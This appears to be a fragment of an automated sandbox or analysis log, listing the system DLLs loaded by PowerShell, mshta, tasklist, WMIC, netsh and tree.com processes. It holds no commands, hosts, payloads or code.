Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
